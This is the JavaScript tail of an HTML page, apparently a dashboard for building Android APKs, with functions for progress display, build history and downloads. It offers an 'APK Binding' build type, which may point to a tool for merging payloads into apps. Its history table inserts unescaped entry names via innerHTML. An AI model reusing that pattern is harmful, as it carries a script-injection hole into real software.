        
        /**
         * Update build progress bar and message
         */
        function updateBuildProgress(progress, message) {
            const progressBar = document.getElementById('build-progress-bar');
            const statusMessage = document.getElementById('build-status-message');
            
            progressBar.style.width = `${progress}%`;
            progressBar.textContent = `${progress}%`;
            progressBar.setAttribute('aria-valuenow', progress);
            
            statusMessage.textContent = message;
        }
        
        /**
         * Update build history table
         */
        function updateBuildHistory() {
            const historyTable = document.getElementById('build-history-table');
            
            if (buildHistory.length === 0) {
                historyTable.innerHTML = '<tr><td colspan="5" class="text-center">No build history available</td></tr>';
                return;
            }
            
            // Clear table
            historyTable.innerHTML = '';
            
            // Add history entries in reverse order (newest first)
            buildHistory.slice().reverse().forEach((entry, index) => {
                const row = document.createElement('tr');
                
                const timestamp = new Date(entry.timestamp);
                
                row.innerHTML = `
                    <td>${timestamp.toLocaleString()}</td>
                    <td>${entry.type === 'standalone' ? 'Standalone APK' : 'APK Binding'}</td>
                    <td>${entry.name}</td>
                    <td>${formatFileSize(entry.size)}</td>
                    <td>
                        <button class="btn btn-sm btn-primary download-btn" data-index="${buildHistory.length - 1 - index}">
                            <i class="fas fa-download"></i>
                        </button>
                    </td>
                `;
                
                historyTable.appendChild(row);
            });
            
            // Add click handlers for download buttons
            document.querySelectorAll('.download-btn').forEach(button => {
                button.addEventListener('click', function() {
                    const index = parseInt(this.getAttribute('data-index'));
                    if (index >= 0 && index < buildHistory.length) {
                        downloadBuildByPath(buildHistory[index].path);
                    }
                });
            });
        }
        
        /**
         * Download current build
         */
        function downloadBuild() {
            if (currentBuildPath) {
                downloadBuildByPath(currentBuildPath);
            }
        }
        
        /**
         * Download a build by path
         */
        function downloadBuildByPath(path) {
            // In a real implementation, this would be an AJAX request to download the file
            fetch(`/api/download?path=${encodeURIComponent(path)}`)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Download failed');
                    }
                    return response.blob();
                })
                .then(blob => {
                    // Create a download link
                    const url = window.URL.createObjectURL(blob);
                    const a = document.createElement('a');
                    a.style.display = 'none';
                    a.href = url;
                    a.download = path.split('/').pop();
                    document.body.appendChild(a);
                    a.click();
                    window.URL.revokeObjectURL(url);
                })
                .catch(error => {
                    console.error('Error downloading file:', error);
                    addStatusMessage('Error downloading file: ' + error.message, 'error');
                });
        }
        
        /**
         * Format file size in human-readable form
         */
        function formatFileSize(bytes) {
            if (bytes === 0) return '0 Bytes';
            
            const k = 1024;
            const sizes = ['Bytes', 'KB', 'MB', 'GB'];
            const i = Math.floor(Math.log(bytes) / Math.log(k));
            
            return parseFloat((bytes / Math.pow(k, i)).toFixed(2)) + ' ' + sizes[i];
        }
    </script>
</body>
</html>